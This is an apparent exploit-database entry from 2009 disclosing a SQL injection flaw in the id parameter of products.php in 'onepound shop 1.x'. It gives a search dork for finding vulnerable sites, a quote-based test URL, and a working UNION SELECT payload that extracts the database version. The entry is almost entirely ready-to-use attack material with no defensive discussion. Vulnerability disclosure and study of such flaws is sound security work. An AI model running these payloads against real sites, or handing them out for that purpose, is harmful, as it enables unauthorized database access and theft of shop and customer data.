id: 5487
date: 07/12/2009
title: onepound shop 1.x products.php SQL Injection Vulnerability
author: Affix
cves: 

==========================================================
onepound shop 1.x products.php SQL Injection Vulnerability
==========================================================


#################################################################
#[+] onepund shop 1.x products.php SQL Injection Vulnerability  #
#[+] Vendor : onepound.cn <ttp://www.onepound.cn/>              #
#[+] dork : "Powered by OnePound"				#
#################################################################

Example :
   http://site.com/products.php?id='

Demo :
   http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--




#  0day.today [2023-03-27]  #